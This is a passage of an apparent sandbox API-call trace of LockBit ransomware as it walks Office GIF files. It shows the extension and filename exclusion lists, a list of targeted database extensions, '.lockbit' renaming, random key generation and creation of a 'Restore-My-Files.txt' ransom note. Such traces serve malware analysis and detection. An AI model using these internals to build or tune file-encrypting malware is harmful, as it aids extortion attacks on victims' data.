lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14595_.GIF") returned 1 [0205.929] lstrcmpiW (lpString1="ntldr", lpString2="BD14595_.GIF") returned 1 [0205.929] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14595_.GIF") returned 1 [0205.929] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14595_.GIF") returned 1 [0205.929] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14595_.GIF") returned -1 [0205.929] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14595_.GIF") returned 1 [0205.929] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14595_.GIF") returned 1 [0205.929] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.929] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14595_.GIF") returned=".GIF" [0205.929] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.929] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.929] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.929] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.929] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.929] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.929] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.929] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.930] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.930] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.930] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.930] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.930] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.930] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.930] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.930] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14595_.GIF.lockbit") returned 76 [0205.930] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14595_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14595_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.932] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.932] malloc (_Size=0x40068) returned 0x3df0008 [0205.932] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=471) returned 1 [0205.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.932] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.933] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.937] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14595_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14595_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.937] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.937] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.937] free (_Block=0x1fa2ed8) [0205.937] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14595_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.937] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.937] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.937] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe2ea600, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc952300, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe2ea600, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0x11c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14677_.GIF", cAlternateFileName="")) returned 1 [0205.937] lstrcmpiW (lpString1=".", lpString2="BD14677_.GIF") returned -1 [0205.937] lstrcmpiW (lpString1="..", lpString2="BD14677_.GIF") returned -1 [0205.937] PathFindExtensionW (pszPath="BD14677_.GIF") returned=".GIF" [0205.937] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.937] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.937] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.938] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.938] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.938] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.938] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.938] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.938] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.938] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.938] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.938] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.938] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.938] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.938] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.939] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14677_.GIF") returned 1 [0205.939] lstrcmpiW (lpString1="ntldr", lpString2="BD14677_.GIF") returned 1 [0205.939] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14677_.GIF") returned 1 [0205.939] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14677_.GIF") returned 1 [0205.939] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14677_.GIF") returned -1 [0205.939] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14677_.GIF") returned 1 [0205.939] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14677_.GIF") returned 1 [0205.939] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.939] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14677_.GIF") returned=".GIF" [0205.939] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.939] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.939] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.940] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.940] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.940] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14677_.GIF.lockbit") returned 76 [0205.940] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14677_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14677_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.942] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.942] malloc (_Size=0x40068) returned 0x3df0008 [0205.942] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=284) returned 1 [0205.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.943] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.943] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.947] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14677_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14677_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.947] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.947] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.947] free (_Block=0x1fa2ed8) [0205.947] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14677_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.947] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.948] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.948] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdadef00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc978460, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xcdadef00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14710_.GIF", cAlternateFileName="")) returned 1 [0205.948] lstrcmpiW (lpString1=".", lpString2="BD14710_.GIF") returned -1 [0205.948] lstrcmpiW (lpString1="..", lpString2="BD14710_.GIF") returned -1 [0205.948] PathFindExtensionW (pszPath="BD14710_.GIF") returned=".GIF" [0205.948] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.948] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.948] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.948] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.948] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.948] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.948] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.948] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.948] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.948] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.948] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.948] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.948] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.948] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.948] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.948] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.948] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.948] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.948] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.948] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.949] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.949] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.949] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.949] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.949] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.949] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14710_.GIF") returned 1 [0205.949] lstrcmpiW (lpString1="ntldr", lpString2="BD14710_.GIF") returned 1 [0205.950] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14710_.GIF") returned 1 [0205.950] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14710_.GIF") returned 1 [0205.950] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14710_.GIF") returned -1 [0205.950] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14710_.GIF") returned 1 [0205.950] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14710_.GIF") returned 1 [0205.950] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.950] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14710_.GIF") returned=".GIF" [0205.950] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.950] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.950] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.950] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.950] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.950] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.950] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.950] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.950] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.950] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.951] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.951] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.951] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.951] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.951] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.951] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.951] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14710_.GIF.lockbit") returned 76 [0205.951] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14710_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14710_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.952] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.952] malloc (_Size=0x40068) returned 0x3df0008 [0205.952] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=766) returned 1 [0205.952] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.953] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.953] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.953] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.953] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14710_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14710_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.970] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.970] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.970] free (_Block=0x1fa2ed8) [0205.970] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14710_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.970] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft 